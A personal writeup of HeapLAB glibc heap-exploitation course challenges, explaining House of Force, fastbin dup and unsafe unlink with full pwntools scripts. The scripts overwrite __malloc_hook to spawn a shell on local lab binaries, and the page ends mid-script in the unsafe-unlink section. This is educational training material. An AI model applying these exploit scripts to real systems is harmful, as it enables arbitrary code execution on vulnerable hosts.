URI:
       HeapLAB
       
       2025-12-24
       Tags: pwn
       
       Table of Contents
       
       
       Below are some of  my notes and challenge writeups for Max Kamper's
       excellent Glibc malloc pwn course, HeapLAB [1].
       
       This  page  will  be  updated  with  more  challenges   in  the
       future.
       
       == House of Force
       
       
       This  technique  comes  from  Phantasmal   Phantasmagoria's  Malloc
       Maleficarum  [2], one  of  the most  seminal early works in  pwning
       Glibc  malloc  (and  the reason  so  many  heap exploits are called
       "House of XYZ").
       
       In Glibc,  malloc requests for  memory  are  serviced from the  top
       chunk (aka the wilderness).
       Because  heap  metadata is stored in-line  (the  size  of  a  chunk
       occupies the  first 8 bytes of every chunk, just before the address
       returned  from  `malloc`),  if  we  have a heap
       overflow we can clobber this  metadata and create a huge top chunk;
       so huge in  fact that it wraps around the virtual address space  to
       an address before the start of the top chunk.
       Then we can request a massive  chunk from  malloc  that stops  just
       short of our  target  address  such  that the first 8 bytes of  the
       (new) top chunk reside at the target address.
       Use  the  same heap overflow  as  before  and we've overwritten the
       target value!
       
       === Solve
       
       
       The vulnerability in this binary is that `read`
       uses    the   size    of   the    chunk    (returned    by
       `malloc_usable_size`),  not  the  size  of  the
       user's  data,  resulting  in  an  8  byte  overflow  if we  request
       `CHUNK_SIZE-8` bytes  from  malloc  (this  is the maximum
       size  of  user  data that  can  fit in  a  chunk  of  size
       `CHUNK_SIZE`).
       from pwn import *
       
       context.log_level = 'warning'
       
       elf = context.binary = ELF("house_of_force")
       libc = ELF(elf.runpath + b"/libc.so.6")
       
       def malloc(size, data):
           proc.send(b"1")
           proc.sendafter(b"size: ", f"{size}".encode())
           proc.sendafter(b"data: ", data)
           proc.recvuntil(b"> ")
       
       proc = remote("localhost", 1337)
       
       proc.recvuntil(b"puts() @ ")
       libc.address = int(proc.recvline(), 16) - libc.sym.puts
       
       proc.recvuntil(b"heap @ ")
       heap = int(proc.recvline(), 16)
       proc.recvuntil(b"> ")
       
       info(f"heap: 0x{heap:02x}")
       proc.timeout = 0.5
       
       malloc(0x20-8, b"A"*(0x20-8) + p64(0xffffffffffffffff))
       # we're calculating the distance between the end of the previous chunk and the address exactly one chunk away (0x20 bytes) from __malloc_hook, so that the next chunk we allocate will overwrite __malloc_hook
       # also we have a heap leak so put /bin/sh on the heap
       malloc((libc.sym.__malloc_hook-0x20) - (heap+0x20), b"/bin/sh\x00")
       malloc(0x20-8, p64(libc.sym.system))
       # the size of the chunk gets passed to __malloc_hook, so we will allocate &"/bin/sh\x00" bytes
       malloc(heap+0x20+0x8+0x8, b"")
       
       proc.sendline(b"id")
       print(proc.recvall(timeout=0.1))
       b'uid=1000(pwny) gid=100(users) groups=100(users),1(wheel)\n'
       
       == Fastbin dup
       
       
       This   time  the  vuln   is  a   nice  and   simple  double   free:
       `free` doesn't check if an index was previously
       freed, so we  can free a previously `malloc`​ed
       chunk as many times as we want.
       
       Before we move on let's  talk about in-band (stored on the heap) vs
       out-of-band (stored somewhere besides the heap) heap metadata.
       We saw previously  that  the size of a chunk is stored in the chunk
       itself, but how does `malloc` know  where  e.g.
       the top chunk is in order to service a request?
       A heap  arena is a data structure that does  all  of the  necessary
       bookkeeping for the heap, or more accurately a heap.
       When a  program has multiple  threads,  it would be  inefficient to
       have  to contend  for a lock  for every  allocation/free,  so  each
       thread  (up  to a limit) gets  their  own  slice of  the heap  (the
       section of program memory) governed by their own heap arena.
       struct malloc_state
       {
         /* Serialize access.  */
         __libc_lock_define (, mutex);
       
         /* Flags (formerly in max_fast).  */
         int flags;
       
         /* Set if the fastbin chunks contain recently inserted free blocks.  */
         /* Note this is a bool but not all targets support atomics on booleans.  */
         int have_fastchunks;
       
         /* Fastbins */
         mfastbinptr fastbinsY[NFASTBINS];
       
         /* Base of the topmost chunk -- not otherwise kept in a bin */
         mchunkptr top;
       
         /* The remainder from the most recent split of a small request */
         mchunkptr last_remainder;
       
         /* Normal bins packed as described above */
         mchunkptr bins[NBINS * 2 - 2];
       
         /* Bitmap of bins */
         unsigned int binmap[BINMAPSIZE];
       
         /* Linked list */
         struct malloc_state *next;
       
         /* Linked list for free arenas.  Access to this field is serialized
            by free_list_lock in arena.c.  */
         struct malloc_state *next_free;
       
         /* Number of threads attached to this arena.  0 if the arena is on
            the free list.  Access to this field is serialized by
            free_list_lock in arena.c.  */
         INTERNAL_SIZE_T attached_threads;
       
         /* Memory allocated from the system in this arena.  */
         INTERNAL_SIZE_T system_mem;
         INTERNAL_SIZE_T max_system_mem;
       };
       
       The important bit of metadata we care about here are the fastbins.
       As an optimization for  small (and therefore frequent) allocations,
       for chunk sizes within the first `NFASTBINS` multiples of
       the smallest chunk size, freeing a chunk of this size adds it to  a
       corresponding singly  linked  list  (and  the heads of these linked
       lists are stored in `fastbinsY`).
       And while  the heads of  the  linked lists are stored in the arena,
       subsequent pointers are stored in-line  in  the chunks  themselves,
       overlapping with where user data normally goes.
       
       I like to think of a chunk like this:
       struct fastbin_chunk_0x20 {
         union {
           struct {
             size_t _size : 61;
             unsigned int non_main_arena : 1;
             unsigned int is_mmapped : 1;
             unsigned int prev_inuse : 1;
           };
           size_t size;
         };
         union {
           struct {
             fastbin_chunk_0x20* fd;
             char _reserved[0x20-8-8];<<footnote(1)>>
           } free;
           struct {
             char data[0x20-8];
           } inuse;
         };
       };
       
       Combining this knowledge with our double free,  we could free chunk
       A  twice,  causing  it  to  be  added  to  the corresonding fastbin
       freelist twice; then  we could `malloc` chunk B
       of the same size as A, and the first 8 bytes of the user accessible
       data  of  chunk B  that  `malloc`  returns will
       still be interpreted  as a `fd` pointer for the
       next occurence of  chunk  A (the one that's  still  in the
       freelist).
       Then  we could  corrupt  this `fd` pointer  and
       when we allocate another chunk C, `malloc` will
       return a chunk at wherever  the corrupted  `fd`
       points.
       
       As  an  additional  complication,  we  can't actually just allocate
       chunk     A     and     then     free     it     twice,     because
       `malloc` checks  if the chunk  we're adding  to
       the freelist is the same chunk that's at the head of the freelist:
       size_t victim_idx = fastbin_index (chunksize (victim));
       if (__builtin_expect (victim_idx != idx, 0))
           malloc_printerr ("malloc(): memory corruption (fast)");
       
       This is trivially bypassed  by freeing a different chunk in between
       the two `free`​s of chunk A.
       
       === Solve
       
       
       There are a few complications to address when  actually writing the
       exploit.
       
       We  have  a  libc   leak  again  so  malloc   hooks   (particularly
       `__malloc_hook`                             and
       `__free_hook`) are viable targets.
       However,  because this  time we're allocating  a fake  chunk from a
       corrupted freelist pointer, the 16 bytes before our target  must be
       valid metadata for a freed chunk.
       
       `__free_hook` is surrounded by zeroes so it's a
       no-go,   but  `__malloc_hook`  is  a  different
       story:
   IMG image
       
       Instead of putzing around with finding a good  alignment ourselves,
       we can let pwndbg do it for us:
   IMG image
       
       But a size field of 0xf8 is larger than that of the largest chunk's
       fastbin (0x80).
       The  values  of  `_IO_wide_data_0+240`   differ
       between   my  aarch64-linux  NixOS  VM  (running  the  binary  with
       QEMU/Rosetta [3]) and the intended x86_64-linux  Ubuntu VM, so this
       approach won't work for my setup specifically.
       
       The same is also true for trying  FSOP, as we can't  create a  fake
       chunk in `__GI__IO_file_jumps`.
       
       We'll soon  discuss a very interesting method of  using the fastbin
       dupe   to  corrupt   `main_arena`'s   top_chunk
       pointer,  but that  requires  more allocations  than  the  7  we're
       permitted here, so we'll settle for overwriting the target for now.
       from pwn import *
       
       context.log_level = 'warning'
       
       elf = context.binary = ELF("fastbin_dup")
       libc = ELF(elf.runpath + b"/libc.so.6")
       
       def malloc(size, data):
           proc.send(b"1")
           proc.sendafter(b"size: ", f"{size}".encode())
           proc.sendafter(b"data: ", data)
           proc.recvuntil(b"> ")
       
       def free(index):
           proc.send(b"2")
           proc.sendafter(b"index: ", f"{index}".encode())
           proc.recvuntil(b"> ")
       
       proc = remote("localhost", 1337)
       
       proc.recvuntil(b"puts() @ ")
       libc.address = int(proc.recvline(), 16) - libc.sym.puts
       
       proc.sendafter(b"Enter your username: ", p64(0x20))
       
       proc.recvuntil(b"> ")
       proc.timeout = 0.5
       
       proc.send(b"3")
       proc.recvline()
       print(proc.recvline())
       
       # 0x20 freelist: NULL
       malloc(0x20-8, b"A")
       malloc(0x20-8, b"B")
       free(0)
       # 0x20 freelist: [chunk A] -> NULL
       free(1)
       # 0x20 freelist: [chunk B] -> [chunk A] -> NULL
       free(0)
       # 0x20 freelist: [chunk A] -> [chunk B] -> [chunk A] -> NULL
       malloc(0x20-8, p64(elf.sym.user-8)) # chunk C
       # 0x20 freelist: [chunk B] -> [chunk A] -> &user
       malloc(0x20-8, b"D")
       # 0x20 freelist: [chunk A] -> &user
       malloc(0x20-8, b"E")
       # 0x20 freelist: &user
       malloc(0x20-8, b"F"*8 + b"pwned")
       
       proc.send(b"3")
       proc.recvline()
       print(proc.recvline())
       b'target: XXXXXXX\n'
       b'target: pwnedXX\n'
       
       === Challenge solve
       
       
       So     I    hinted    that    there's    a    way     to    corrupt
       `main_arena`'s top_chunk  pointer to achieve  a
       truly arbitrary write, and indeed we'll do just that.
       
       The basic idea is that we  have an arbitrary write over the fastbin
       head  pointers;  most values don't  point  to valid  freed  fastbin
       chunks and will therefore crash  during  the integrity checks  when
       allocating from  that  fastbin,  but what if  we used that value to
       create     a      fake     free      fastbin      cache      inside
       `main_arena`?
       Then  we  could   use   another   fastbin  dupe  to   clobber   the
       `top`  chunk   pointer,  which   is  convenient
       because allocations serviced from the top  chunk are not subject to
       the same strict size integrity checks as fastbin chunks!
       
       By  settings the  the  `top`  pointer  to  just
       before  `__malloc_hook` (with some misalignment
       introduced to ensure the fake top chunk has a valid size field), we
       can     jump    to    a    one_gadget    when    we    next    call
       `malloc`:
       one_gadget $(patchelf --print-rpath fastbin_dup_2)/libc.so.6
       0xc4dbf execve("/bin/sh", r13, r12)
       constraints:
         [r13] == NULL || r13 == NULL || r13 is a valid argv
         [r12] == NULL || r12 == NULL || r12 is a valid envp
       
       0xc4ddf execve("/bin/sh", rbp-0x40, r12)
       constraints:
         address rbp-0x38 is writable
         rdi == NULL || {"/bin/sh", rdi, NULL} is a valid argv
         [r12] == NULL || r12 == NULL || r12 is a valid envp
       
       0xc4de6 execve("/bin/sh", rbp-0x40, r12)
       constraints:
         address rbp-0x38 is writable
         rax == NULL || {rax, rdi, NULL} is a valid argv
         [r12] == NULL || r12 == NULL || r12 is a valid envp
       
       0xe1fa1 execve("/bin/sh", rsp+0x50, environ)
       constraints:
         [rsp+0x50] == NULL || {[rsp+0x50], [rsp+0x58], [rsp+0x60], [rsp+0x68], ...} is a valid argv
       
       As it  happens we control  the contents  of `[rsp+0x50]`,
       which we  can  set to  a  string  that  prevents  further  argument
       processing;     `"-s"`     does     the     trick     for
       `dash`​/​`bash`.
       from pwn import *
       
       context.log_level = 'warning'
       
       elf = context.binary = ELF("fastbin_dup_2")
       libc = ELF(elf.runpath + b"/libc.so.6")
       
       def malloc(size, data):
           proc.send(b"1")
           proc.sendafter(b"size: ", f"{size}".encode())
           proc.sendafter(b"data: ", data)
           proc.recvuntil(b"> ")
       
       def free(index):
           proc.send(b"2")
           proc.sendafter(b"index: ", f"{index}".encode())
           proc.recvuntil(b"> ")
       
       proc = remote("localhost", 1337)
       
       proc.recvuntil(b"puts() @ ")
       libc.address = int(proc.recvline(), 16) - libc.sym.puts
       
       proc.recvuntil(b"> ")
       proc.timeout = 0.5
       
       one_gadget = libc.address + 0xe1fa1
       
       # 0x80 freelist: NULL
       malloc(0x20-8, b"A")
       malloc(0x20-8, b"B")
       free(0)
       # 0x20 freelist: [chunk A] -> NULL
       free(1)
       # 0x20 freelist: [chunk B] -> [chunk A] -> NULL
       free(0)
       # 0x20 freelist: [chunk A] -> [chunk B] -> [chunk A] -> NULL
       malloc(0x20-8, p64(0x60)) # chunk C
       # 0x20 freelist: [chunk B] -> [chunk A] -> 0x60
       malloc(0x20-8, b"D")
       # 0x20 freelist: [chunk A] -> 0x60
       malloc(0x20-8, b"E")
       # 0x20 freelist: 0x60
       
       malloc(0x60-8, b"F")
       malloc(0x60-8, b"G")
       free(5)
       # 0x60 freelist: [chunk F] -> NULL
       free(6)
       # 0x60 freelist: [chunk G] -> [chunk F] -> NULL
       free(5)
       # 0x60 freelist: [chunk F] -> [chunk G] -> [chunk F] -> NULL
       malloc(0x60-8, p64(libc.sym.main_arena+8)) # chunk H
       # 0x60 freelist: [chunk F] -> [chunk G] -> &main_arena
       malloc(0x60-8, b"-s\x00") # chunk I, lives at rsp+0x50 when __malloc_hook is executed
       # 0x60 freelist: [chunk G] -> &main_arena
       malloc(0x60-8, b"J")
       # 0x60 freelist: &main_arena
       malloc(0x60-8, b"\x00"*0x48 + p64(libc.sym.__malloc_hook-0x1c-8))
       # main_arena.top_chunk = &__malloc_hook-0x10
       malloc(0x80-8, b"L"*20 + p64(one_gadget)) # chunk L
       # __malloc_hook = &one_gadget
       malloc(0x2d, b"") # chunk M
       # __malloc_hook triggered
       
       proc.sendline("id")
       print(proc.recvline())
       b'uid=1000(pwny) gid=100(users) groups=100(users),1(wheel)\n'
       
       == Unsafe unlink
       
       
       When  a "normal"  chunk  is freed,  it is  added to the unsortedbin
       doubly linked list;  this behaves very  similarly to  the fastbins,
       except there's now an additional  `bk`  pointer
       stored after the `fd` pointer.
       
       But having a bunch of randomly  sized  chunks  in a freelist is not
       really ideal, as we'd like to be  able to reclaim  these chunks and
       use them for even larger allocations.
       Enter  chunk consolidation—when a chunk is freed, malloc will check
       if the  chunk's neighboring chunks are  also freed,  in which  case
       malloc will backwards and/or forwards consolidate the chunks into a
       single larger chunk.
       But a freed chunk is  still inside the unsortedbin  we talked about
       earlier, so  before  this consolidation  can  occur  malloc has  to
       unlink  one or more nodes from the unsortedbin linked  list (as the
       chunk being freed  is  merged  with one or both of  its neighboring
       chunks).
       
       In  older  versions of Glibc  this  linked  list unlinking was  not
       performed safely, so by corrupting  heap  chunks one could leverage
       this chunk consolidation  for  a (somewhat  constrained)  reflected
       write.[^fn:2]
       
       === Solve
       
       
       In  this  challenge we can  write  8  bytes  past the  end  of  our
       requested  size, which we can use  to corrupt the next chunk's size
       field and flags.
       
       By clearing chunk B's `prev_inuse` flag, we can
       convince  malloc that the  chunk before chunk  B (chunk A) is freed
       for the purposes of chunk consolidation when chunk B is freed.
       When we free chunk B,  malloc will attempt to  unlink chunk A  from
       the   unsortedbin  freelist  by   setting  `chunk_a.bk->fd   =
       chunk_a.fd`        and       `chunk_a.fd->bk       =
       chunk_a.bk`    (using    temporary    variables     where
       appropriate):
       #define unlink(AV, P, BK, FD) {\
           FD = P->fd;\
           BK = P->bk;\
           FD->bk = BK;\
           BK->fd = FD;\
           if (!in_smallbin_range (P->size)\
               && __builtin_expect (P->fd_nextsize != NULL, 0)) {\
                   if (FD->fd_nextsize == NULL) {\
                       if (P->fd_nextsize == P)\
                         FD->fd_nextsize = FD->bk_nextsize = FD;\
                       else {\
                           FD->fd_nextsize = P->fd_nextsize;\
                           FD->bk_nextsize = P->bk_nextsize;\
                           P->fd_nextsize->bk_nextsize = FD;\
                           P->bk_nextsize->fd_nextsize = FD;\
                       }\
                   } else {\
                       P->fd_nextsize->bk_nextsize = P->bk_nextsize;\
                       P->bk_nextsize->fd_nextsize = P->fd_nextsize;\
                   }\
           }\
       }
       
       With that in mind the exploit is pretty straightforward.
       Unfortunately I can't use the OG method of writing shellcode on the
       heap because in QEMU/Rosetta the heap isn't marked executable (even
       though the stack is—weird), and  we can't use  a one_gadget because
       Glibc `.text` isn't writable:
       [*] './unsafe_unlink'
           Arch:       amd64-64-little
           RELRO:      Full RELRO
           Stack:      Canary found
           NX:         NX unknown - GNU_STACK missing
           PIE:        PIE enabled
           Stack:      Executable
           RWX:        Has RWX segments
           RUNPATH:    b'../.glibc/glibc_2.23_unsafe-unlink'
           Stripped:   No
           Debuginfo:  Yes
       from pwn import *
       
       context.log_level = 'warning'
       
       elf = context.binary = ELF("unsafe_unlink")
       libc = ELF(elf.runpath + b"/libc.so.6")
       
       def malloc(size):
           proc.send(b"1")
           proc.sendafter(b"size: ", f"{size}".encode())
           proc.recvuntil(b"> ")
       
       def edit(index, data):
           proc.send(b"2")
           proc.sendafter(b"index: ", f"{index}".encode())
           proc.sendafter(b"data: ", data)
           proc.recvuntil(b"> ")
       
       def free(index):
           proc.send(b"3")
           proc.sendafter(b"index: ", f"{index}".encode())
           proc.recvuntil(b"> ")
       
       proc = remote("localhost", 1337)
       
       proc.recvuntil(b"puts() @ ")
       libc.address = int(proc.recvline(), 16) - libc.sym.puts
       
       proc.recvuntil(b"heap @ ")
       heap = int(proc.recvline(), 16)
       
       proc.recvuntil(b"> ")
       proc.timeout = 0.5
       
       shellcode = flat(
           asm("jmp .+18"),
           p64(0),
           p64(0),
           asm(shellcraft.amd64.linux.sh())
       )
       # start of the heap plus the size, fd, and bk fields of chunk A
       shellcode_addr = heap + 8 + 8 + 8 + 8
       
       malloc(0x3f0-8) # chunk A
       malloc(0x3f0-8) # chunk B
gopher.feyor.sh:70 /writeups/heaplab:537: line too long